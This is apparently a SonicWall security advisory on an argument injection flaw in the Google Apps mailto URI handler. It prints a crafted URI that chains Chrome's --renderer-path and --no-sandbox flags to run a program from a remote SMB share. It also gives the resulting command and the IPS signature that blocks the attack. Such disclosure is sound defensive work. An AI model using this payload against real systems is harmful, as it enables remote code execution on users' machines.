Google Apps is a service from Google featuring several Web applications with similar functionality to traditional office suites, including: Gmail, Google Calendar, Talk, Docs and Sites. When Google Apps is installed, the application registers a handler for the googleapps.url.mailto:// URI scheme. Generic format of the scheme is as follows:
googleapps.url.mailto://
Google Apps supports multiple command-line options. One such argument,
“–domain” causes Google Chrome to start and process the specified URL. Google Chrome also supports multiple command-line options. The
“–no-sandbox” disables Google Chrome’s security sandbox. The
“–renderer-path” causes Google Chrome to execute the specified program, even from a SMB share.
There exists an argument injection vulnerability in Google Apps. Specifically, the vulnerability resides in processing a
googleapps.url.mailto:// URI with double-quotes (“). By combining the
“–domain”,
“–renderer-path” and
“–no-sandbox” arguments, one can have Google Chrome executes arbitrary command. A generic example of such malicious URL looks like:
‘googleapps.url.mailto://”%20–domain=”–x%20–renderer-path=\HOSTPATHMALICIOUS.exe%20–no-sandbox%20–x”/’
which will execute the following command:
chrome.exe –renderer-path=\HOSTPATHMALICIOUS.exe –no-sandbox
Google Chrome will not ask user permission or notify the user of such commands. Remote attackers could exploit this vulnerability by enticing a target user to open a web page with a specially crafted
googleapps.url.mailto:// URI. Successful exploitation would result in injection and execution of commands passed to the Google Chrome program. The vulnerability has been assigned as Bugtraq ID
36581. It affects Google Apps v1.1.110 6031 and prior.
SonicWALL has released an IPS signature to detect and block specific exploitation attempts targeting this vulnerability. The signature is listed below:
- 3174 – Google Apps URI Argument Injection
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.